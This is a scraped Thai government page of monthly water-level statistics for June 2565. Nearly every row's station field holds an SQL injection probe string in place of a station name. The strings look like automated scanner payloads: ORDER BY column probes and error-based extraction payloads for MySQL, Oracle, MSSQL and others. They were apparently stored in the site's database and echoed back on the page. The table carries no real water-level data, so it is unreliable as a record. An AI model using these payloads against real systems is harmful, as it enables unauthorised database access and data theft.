สถิติระดับน้ำประจำเดือน (อ.ท.1-04)
ลำดับที่ สถานี เดือน ปีน้ำ แสดง Export to Excel
1 -5068 ORDER BY 2508# อำเภอ จังหวัด มิถุนายน 2565
2 -8655 ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
3 -8370 ORDER BY 2848# อำเภอ จังหวัด มิถุนายน 2565
4 -8851 ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
5 -8848" ORDER BY 1008# อำเภอ จังหวัด มิถุนายน 2565
6 -8389" ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
7 -1973") ORDER BY 4791# อำเภอ จังหวัด มิถุนายน 2565
8 -6935") ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
9 -5786" ORDER BY 5451# อำเภอ จังหวัด มิถุนายน 2565
10 -2974" ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
11 -6737")) ORDER BY 6977# อำเภอ จังหวัด มิถุนายน 2565
12 -6028")) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
13 -3468") ORDER BY 7274# อำเภอ จังหวัด มิถุนายน 2565
14 -9207") ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
15 -2596 ORDER BY 4395# อำเภอ จังหวัด มิถุนายน 2565
16 -4252 ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
17 -9097))) ORDER BY 3069# อำเภอ จังหวัด มิถุนายน 2565
18 -6948))) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
19 -1211)) ORDER BY 7557# อำเภอ จังหวัด มิถุนายน 2565
20 -5129)) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
21 -4518) ORDER BY 4210# อำเภอ จังหวัด มิถุนายน 2565
22 -6933) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
23 -4452) ORDER BY 5914# อำเภอ จังหวัด มิถุนายน 2565
24 -7983) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
25 ORDER BY 9738# อำเภอ จังหวัด มิถุนายน 2565
26 ORDER BY 9666# อำเภอ จังหวัด มิถุนายน 2565
27 " ORDER BY 7117# อำเภอ จังหวัด มิถุนายน 2565
28 ") ORDER BY 1992# อำเภอ จังหวัด มิถุนายน 2565
29 " ORDER BY 2587# อำเภอ จังหวัด มิถุนายน 2565
30 " ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
31 ")) ORDER BY 6102# อำเภอ จังหวัด มิถุนายน 2565
32 ")) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
33 ") ORDER BY 1295# อำเภอ จังหวัด มิถุนายน 2565
34 ") ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
35 ORDER BY 4507# อำเภอ จังหวัด มิถุนายน 2565
36 ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
37 ))) ORDER BY 7806# อำเภอ จังหวัด มิถุนายน 2565
38 ))) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
39 )) ORDER BY 7262# อำเภอ จังหวัด มิถุนายน 2565
40 )) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
41 ) ORDER BY 6623# อำเภอ จังหวัด มิถุนายน 2565
42 ) ORDER BY 7597# อำเภอ จังหวัด มิถุนายน 2565
43 ) ORDER BY 1# อำเภอ จังหวัด มิถุนายน 2565
44 -2248 ORDER BY 1854-- jrdI อำเภอ จังหวัด มิถุนายน 2565
45 -1237 ORDER BY 1-- lvfU อำเภอ จังหวัด มิถุนายน 2565
46 -4420 ORDER BY 6656-- yxeL อำเภอ จังหวัด มิถุนายน 2565
47 -7016 ORDER BY 1-- ZGEA อำเภอ จังหวัด มิถุนายน 2565
48 -7822" ORDER BY 5323-- BSPo อำเภอ จังหวัด มิถุนายน 2565
49 -9084" ORDER BY 1-- wBwt อำเภอ จังหวัด มิถุนายน 2565
50 -4308") ORDER BY 8678-- zpFb อำเภอ จังหวัด มิถุนายน 2565
51 -9848") ORDER BY 1-- eWoP อำเภอ จังหวัด มิถุนายน 2565
52 -4204" ORDER BY 9957-- TYzs อำเภอ จังหวัด มิถุนายน 2565
53 -5529" ORDER BY 1-- aHwc อำเภอ จังหวัด มิถุนายน 2565
54 -8689")) ORDER BY 9465-- JcFL อำเภอ จังหวัด มิถุนายน 2565
55 -9594")) ORDER BY 1-- osAX อำเภอ จังหวัด มิถุนายน 2565
56 -2939") ORDER BY 1815-- qPyM อำเภอ จังหวัด มิถุนายน 2565
57 -1678") ORDER BY 1-- kKyF อำเภอ จังหวัด มิถุนายน 2565
58 -1947 ORDER BY 5151-- UsdR อำเภอ จังหวัด มิถุนายน 2565
59 -3396 ORDER BY 1-- tiod อำเภอ จังหวัด มิถุนายน 2565
60 -6394))) ORDER BY 7260-- OwBZ อำเภอ จังหวัด มิถุนายน 2565
61 -8136))) ORDER BY 1-- tVxR อำเภอ จังหวัด มิถุนายน 2565
62 -9926)) ORDER BY 3003-- srSy อำเภอ จังหวัด มิถุนายน 2565
63 -8296)) ORDER BY 1-- JaaO อำเภอ จังหวัด มิถุนายน 2565
64 -7657) ORDER BY 3356-- Pxts อำเภอ จังหวัด มิถุนายน 2565
65 -4569) ORDER BY 1-- TQrI อำเภอ จังหวัด มิถุนายน 2565
66 -7538) ORDER BY 3760-- DHle อำเภอ จังหวัด มิถุนายน 2565
67 -6379) ORDER BY 1-- gLww อำเภอ จังหวัด มิถุนายน 2565
68 ORDER BY 5316-- RwFc อำเภอ จังหวัด มิถุนายน 2565
69 ORDER BY 1-- RZtQ อำเภอ จังหวัด มิถุนายน 2565
70 ORDER BY 8370-- UyzB อำเภอ จังหวัด มิถุนายน 2565
71 ORDER BY 1-- JYrc อำเภอ จังหวัด มิถุนายน 2565
72 " ORDER BY 9648-- vtDD อำเภอ จังหวัด มิถุนายน 2565
73 " ORDER BY 1-- AdjJ อำเภอ จังหวัด มิถุนายน 2565
74 ") ORDER BY 9832-- muCY อำเภอ จังหวัด มิถุนายน 2565
75 ") ORDER BY 1-- SOwZ อำเภอ จังหวัด มิถุนายน 2565
76 " ORDER BY 2158-- PijT อำเภอ จังหวัด มิถุนายน 2565
77 " ORDER BY 1-- iXIj อำเภอ จังหวัด มิถุนายน 2565
78 ")) ORDER BY 8256-- pxzw อำเภอ จังหวัด มิถุนายน 2565
79 ")) ORDER BY 1-- iWcN อำเภอ จังหวัด มิถุนายน 2565
80 ") ORDER BY 1773-- Jjiq อำเภอ จังหวัด มิถุนายน 2565
81 ") ORDER BY 1-- uSDL อำเภอ จังหวัด มิถุนายน 2565
82 ORDER BY 3453-- oDFG อำเภอ จังหวัด มิถุนายน 2565
83 ORDER BY 1-- xTvU อำเภอ จังหวัด มิถุนายน 2565
84 ))) ORDER BY 8860-- zeQW อำเภอ จังหวัด มิถุนายน 2565
85 ))) ORDER BY 1-- hNhM อำเภอ จังหวัด มิถุนายน 2565
86 )) ORDER BY 1762-- jKQp อำเภอ จังหวัด มิถุนายน 2565
87 )) ORDER BY 1-- cBzs อำเภอ จังหวัด มิถุนายน 2565
88 ) ORDER BY 6911-- nMHV อำเภอ จังหวัด มิถุนายน 2565
89 ) ORDER BY 1-- GVYt อำเภอ จังหวัด มิถุนายน 2565
90 ) ORDER BY 9332-- YYdA อำเภอ จังหวัด มิถุนายน 2565
91 ) ORDER BY 1-- HyGq อำเภอ จังหวัด มิถุนายน 2565
92 SELECT CHAR(113,113,107,112,113)||(CASE WHEN (9266=9266) THEN 1 ELSE 0 END)||CHAR(113,106,113,113,1 อำเภอ จังหวัด มิถุนายน 2565
93 (SELECT CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(CASE WHEN (4640=4640) THEN TO_NUMBER(1) อำเภอ จังหวัด มิถุนายน 2565
94 (SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(CASE WHEN (8959=8959) THEN CHAR(49) ELSE อำเภอ จังหวัด มิถุนายน 2565
95 (SELECT (CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (9112=9112) THEN 1 E อำเภอ จังหวัด มิถุนายน 2565
96 (SELECT CONCAT(0x71716b7071,(ELT(1888=1888,1)),0x716a717171)) อำเภอ จังหวัด มิถุนายน 2565
97 ,(CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6651=6651) THEN 1 EL อำเภอ จังหวัด มิถุนายน 2565
98 ,(SELECT 3311 FROM (SELECT ROW(3311,9501)>(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(3311=33 อำเภอ จังหวัด มิถุนายน 2565
99 ,EXTRACTVALUE(4488,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(4488=4488,1))),0x716a717171)) อำเภอ จังหวัด มิถุนายน 2565
100 (SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT ( อำเภอ จังหวัด มิถุนายน 2565
101 (CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6306=630 อำเภอ จังหวัด มิถุนายน 2565
102 (CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (4121=4121) THEN 1 ELS อำเภอ จังหวัด มิถุนายน 2565
103 (EXTRACTVALUE(4730,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(4730=4730,1))),0x716a717171))) อำเภอ จังหวัด มิถุนายน 2565
104 (SELECT 5103 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(5103=5103,1))),0x716a717171,FLOO อำเภอ จังหวัด มิถุนายน 2565
105 " PROCEDURE ANALYSE(EXTRACTVALUE(2133,CONCAT(0x5c,0x71716b7071,(SELECT (CASE WHEN (2133=2133) THEN อำเภอ จังหวัด มิถุนายน 2565
106 ")) PROCEDURE ANALYSE(EXTRACTVALUE(2133,CONCAT(0x5c,0x71716b7071,(SELECT (CASE WHEN (2133=2133) THE อำเภอ จังหวัด มิถุนายน 2565
107 ") PROCEDURE ANALYSE(EXTRACTVALUE(2133,CONCAT(0x5c,0x71716b7071,(SELECT (CASE WHEN (2133=2133) THEN อำเภอ จังหวัด มิถุนายน 2565
108 PROCEDURE ANALYSE(EXTRACTVALUE(2133,CONCAT(0x5c,0x71716b7071,(SELECT (CASE WHEN (2133=2133) THEN 1 อำเภอ จังหวัด มิถุนายน 2565
109 ))) PROCEDURE ANALYSE(EXTRACTVALUE(2133,CONCAT(0x5c,0x71716b7071,(SELECT (CASE WHEN (2133=2133) THE อำเภอ จังหวัด มิถุนายน 2565
110 )) PROCEDURE ANALYSE(EXTRACTVALUE(2133,CONCAT(0x5c,0x71716b7071,(SELECT (CASE WHEN (2133=2133) THEN อำเภอ จังหวัด มิถุนายน 2565
111 ) PROCEDURE ANALYSE(EXTRACTVALUE(2133,CONCAT(0x5c,0x71716b7071,(SELECT (CASE WHEN (2133=2133) THEN อำเภอ จังหวัด มิถุนายน 2565
112 " AND 7901=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(113)||CHR(107)||CH อำเภอ จังหวัด มิถุนายน 2565
113 ")) AND 7901=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(113)||CHR(107)|| อำเภอ จังหวัด มิถุนายน 2565
114 ") AND 7901=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(113)||CHR(107)||C อำเภอ จังหวัด มิถุนายน 2565
115 AND 7901=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(113)||CHR(107)||CHR อำเภอ จังหวัด มิถุนายน 2565
116 ))) AND 7901=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(113)||CHR(107)|| อำเภอ จังหวัด มิถุนายน 2565
117 )) AND 7901=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(113)||CHR(107)||C อำเภอ จังหวัด มิถุนายน 2565
118 ) AND 7901=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(113)||CHR(107)||CH อำเภอ จังหวัด มิถุนายน 2565
119 " AND 5800=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5800=5800) อำเภอ จังหวัด มิถุนายน 2565
120 ")) AND 5800=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5800=5800 อำเภอ จังหวัด มิถุนายน 2565
121 ") AND 5800=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5800=5800) อำเภอ จังหวัด มิถุนายน 2565
122 AND 5800=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5800=5800) T อำเภอ จังหวัด มิถุนายน 2565
123 ))) AND 5800=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5800=5800 อำเภอ จังหวัด มิถุนายน 2565
124 )) AND 5800=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5800=5800) อำเภอ จังหวัด มิถุนายน 2565
125 ) AND 5800=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5800=5800) อำเภอ จังหวัด มิถุนายน 2565
126 " AND 1179=(CODE(113)||CODE(113)||CODE(107)||CODE(112)||CODE(113)||(SELECT CASE 1179 WHEN 1179 THEN อำเภอ จังหวัด มิถุนายน 2565
127 ")) AND 1179=(CODE(113)||CODE(113)||CODE(107)||CODE(112)||CODE(113)||(SELECT CASE 1179 WHEN 1179 TH อำเภอ จังหวัด มิถุนายน 2565
128 ") AND 1179=(CODE(113)||CODE(113)||CODE(107)||CODE(112)||CODE(113)||(SELECT CASE 1179 WHEN 1179 THE อำเภอ จังหวัด มิถุนายน 2565
129 AND 1179=(CODE(113)||CODE(113)||CODE(107)||CODE(112)||CODE(113)||(SELECT CASE 1179 WHEN 1179 THEN อำเภอ จังหวัด มิถุนายน 2565
130 ))) AND 1179=(CODE(113)||CODE(113)||CODE(107)||CODE(112)||CODE(113)||(SELECT CASE 1179 WHEN 1179 TH อำเภอ จังหวัด มิถุนายน 2565
131 )) AND 1179=(CODE(113)||CODE(113)||CODE(107)||CODE(112)||CODE(113)||(SELECT CASE 1179 WHEN 1179 THE อำเภอ จังหวัด มิถุนายน 2565
132 ) AND 1179=(CODE(113)||CODE(113)||CODE(107)||CODE(112)||CODE(113)||(SELECT CASE 1179 WHEN 1179 THEN อำเภอ จังหวัด มิถุนายน 2565
133 " AND 1567=CTXSYS.DRITHSX.SN(1567,(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE อำเภอ จังหวัด มิถุนายน 2565
134 ")) AND 1567=CTXSYS.DRITHSX.SN(1567,(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CAS อำเภอ จังหวัด มิถุนายน 2565
135 ") AND 1567=CTXSYS.DRITHSX.SN(1567,(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE อำเภอ จังหวัด มิถุนายน 2565
136 AND 1567=CTXSYS.DRITHSX.SN(1567,(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE W อำเภอ จังหวัด มิถุนายน 2565
137 ))) AND 1567=CTXSYS.DRITHSX.SN(1567,(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CAS อำเภอ จังหวัด มิถุนายน 2565
138 )) AND 1567=CTXSYS.DRITHSX.SN(1567,(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE อำเภอ จังหวัด มิถุนายน 2565
139 ) AND 1567=CTXSYS.DRITHSX.SN(1567,(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE อำเภอ จังหวัด มิถุนายน 2565
140 " AND 2028=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (C อำเภอ จังหวัด มิถุนายน 2565
141 ")) AND 2028=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT อำเภอ จังหวัด มิถุนายน 2565
142 ") AND 2028=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT ( อำเภอ จังหวัด มิถุนายน 2565
143 AND 2028=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CA อำเภอ จังหวัด มิถุนายน 2565
144 ))) AND 2028=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT อำเภอ จังหวัด มิถุนายน 2565
145 )) AND 2028=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT ( อำเภอ จังหวัด มิถุนายน 2565
146 ) AND 2028=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)||(SELECT (C อำเภอ จังหวัด มิถุนายน 2565
147 " AND 3870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113) อำเภอ จังหวัด มิถุนายน 2565
148 ")) AND 3870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(11 อำเภอ จังหวัด มิถุนายน 2565
149 ") AND 3870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113 อำเภอ จังหวัด มิถุนายน 2565
150 AND 3870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113)| อำเภอ จังหวัด มิถุนายน 2565
151 ))) AND 3870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(11 อำเภอ จังหวัด มิถุนายน 2565
152 )) AND 3870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113 อำเภอ จังหวัด มิถุนายน 2565
153 ) AND 3870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113) อำเภอ จังหวัด มิถุนายน 2565
154 " AND 9256=CONCAT(CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (9256=9256) อำเภอ จังหวัด มิถุนายน 2565
155 ")) AND 9256=CONCAT(CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (9256=9256 อำเภอ จังหวัด มิถุนายน 2565
156 ") AND 9256=CONCAT(CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (9256=9256) อำเภอ จังหวัด มิถุนายน 2565
157 AND 9256=CONCAT(CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (9256=9256) T อำเภอ จังหวัด มิถุนายน 2565
158 ))) AND 9256=CONCAT(CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (9256=9256 อำเภอ จังหวัด มิถุนายน 2565
159 )) AND 9256=CONCAT(CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (9256=9256) อำเภอ จังหวัด มิถุนายน 2565
160 ) AND 9256=CONCAT(CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (9256=9256) อำเภอ จังหวัด มิถุนายน 2565
161 " AND 6071=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN อำเภอ จังหวัด มิถุนายน 2565
162 ")) AND 6071=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WH อำเภอ จังหวัด มิถุนายน 2565
163 ") AND 6071=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHE อำเภอ จังหวัด มิถุนายน 2565
164 AND 6071=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN อำเภอ จังหวัด มิถุนายน 2565
165 ))) AND 6071=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WH อำเภอ จังหวัด มิถุนายน 2565
166 )) AND 6071=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHE อำเภอ จังหวัด มิถุนายน 2565
167 ) AND 6071=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN อำเภอ จังหวัด มิถุนายน 2565
168 " AND 7547 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7547=7 อำเภอ จังหวัด มิถุนายน 2565
169 ")) AND 7547 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7547 อำเภอ จังหวัด มิถุนายน 2565
170 ") AND 7547 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7547= อำเภอ จังหวัด มิถุนายน 2565
171 AND 7547 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7547=75 อำเภอ จังหวัด มิถุนายน 2565
172 ))) AND 7547 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7547 อำเภอ จังหวัด มิถุนายน 2565
173 )) AND 7547 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7547= อำเภอ จังหวัด มิถุนายน 2565
174 ) AND 7547 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7547=7 อำเภอ จังหวัด มิถุนายน 2565
175 " AND 6336=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6336=6336) อำเภอ จังหวัด มิถุนายน 2565
176 ")) AND 6336=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6336=6336 อำเภอ จังหวัด มิถุนายน 2565
177 ") AND 6336=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6336=6336) อำเภอ จังหวัด มิถุนายน 2565
178 AND 6336=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6336=6336) T อำเภอ จังหวัด มิถุนายน 2565
179 ))) AND 6336=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6336=6336 อำเภอ จังหวัด มิถุนายน 2565
180 )) AND 6336=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6336=6336) อำเภอ จังหวัด มิถุนายน 2565
181 ) AND 6336=CAST((CHR(113)||CHR(113)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6336=6336) อำเภอ จังหวัด มิถุนายน 2565
182 " AND ROW(7573,3250)>(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(7573=7573,1))),0x716a717171, อำเภอ จังหวัด มิถุนายน 2565
183 ")) AND ROW(7573,3250)>(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(7573=7573,1))),0x716a71717 อำเภอ จังหวัด มิถุนายน 2565
184 ") AND ROW(7573,3250)>(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(7573=7573,1))),0x716a717171 อำเภอ จังหวัด มิถุนายน 2565
185 AND ROW(7573,3250)>(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(7573=7573,1))),0x716a717171,F อำเภอ จังหวัด มิถุนายน 2565
186 ))) AND ROW(7573,3250)>(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(7573=7573,1))),0x716a71717 อำเภอ จังหวัด มิถุนายน 2565
187 )) AND ROW(7573,3250)>(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(7573=7573,1))),0x716a717171 อำเภอ จังหวัด มิถุนายน 2565
188 ) AND ROW(7573,3250)>(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(7573=7573,1))),0x716a717171, อำเภอ จังหวัด มิถุนายน 2565
189 AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736)# sOqI อำเภอ จังหวัด มิถุนายน 2565
190 AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736)-- mipC อำเภอ จังหวัด มิถุนายน 2565
191 " AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736) AND " อำเภอ จังหวัด มิถุนายน 2565
192 ")) AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736) AND อำเภอ จังหวัด มิถุนายน 2565
193 ") AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736) AND อำเภอ จังหวัด มิถุนายน 2565
194 AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736) อำเภอ จังหวัด มิถุนายน 2565
195 ))) AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736) AND อำเภอ จังหวัด มิถุนายน 2565
196 )) AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736) AND อำเภอ จังหวัด มิถุนายน 2565
197 ) AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736) AND ( อำเภอ จังหวัด มิถุนายน 2565
198 ) AND UPDATEXML(3544,CONCAT(0x2e,0x71716b7071,(SELECT (ELT(3544=3544,1))),0x716a717171),2736)-- Nts อำเภอ จังหวัด มิถุนายน 2565
199 AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171))# eUsQ อำเภอ จังหวัด มิถุนายน 2565
200 AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171))-- MNte อำเภอ จังหวัด มิถุนายน 2565
201 " AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171)) AND "Wt อำเภอ จังหวัด มิถุนายน 2565
202 " AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171)) AND "Si อำเภอ จังหวัด มิถุนายน 2565
203 ")) AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171)) AND ( อำเภอ จังหวัด มิถุนายน 2565
204 ") AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171)) AND (" อำเภอ จังหวัด มิถุนายน 2565
205 AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171)) อำเภอ จังหวัด มิถุนายน 2565
206 ))) AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171)) AND ( อำเภอ จังหวัด มิถุนายน 2565
207 )) AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171)) AND (( อำเภอ จังหวัด มิถุนายน 2565
208 ) AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171)) AND (59 อำเภอ จังหวัด มิถุนายน 2565
209 ) AND EXTRACTVALUE(2599,CONCAT(0x5c,0x71716b7071,(SELECT (ELT(2599=2599,1))),0x716a717171))-- Ckma อำเภอ จังหวัด มิถุนายน 2565
210 " AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(8146=8146,1))),0x716a71717 อำเภอ จังหวัด มิถุนายน 2565
